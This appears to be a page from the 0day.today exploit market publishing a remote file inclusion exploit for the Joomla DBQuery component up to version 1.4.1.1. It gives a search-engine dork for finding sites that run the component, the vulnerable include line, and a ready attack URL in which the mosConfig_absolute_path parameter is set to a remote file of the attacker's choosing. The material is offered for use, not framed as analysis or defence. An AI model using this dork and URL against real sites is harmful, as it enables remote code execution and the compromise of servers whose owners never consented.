[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability

Author
SsEs
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3355
Category
web applications
Date add
03-07-2008
Platform
unsorted
=====================================================
Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability
=====================================================



@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@JOOmla com_dbquery Remote file Inclusion@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ 			Author:SsEs 				  
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ Dork: inurl:"com_dbquery" OR "index.php?option=com_dbquery"
@@@@@@@@@@@@@@@@@ **Bug:
@@@@@@@@@@@@@@@@@ administrator\components\com_dbquery\classes\DBQ\admin\common.class.php on line 6
@@@@@@@@@@@@@@@@@ global $mosConfig_absolute_path;
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ require_once($mosConfig_absolute_path.’/components/com_dbquery/classes/DBQ/common.class.php’);
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@ http://sitename.com/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
@@@@@@@@@@@@@@@@@

side note:
	<name>DBQuery</name>
	<creationDate>February 2007</creationDate>
	<author>Green Mountain Information Technology Consulting</author>
	<copyright>This component is released under the GNU/GPL License</copyright>

	<version>1.4.1 Final</version>
	<description>Database Query is a Joomla query manager.</description>




#  0day.today [2024-12-24]  #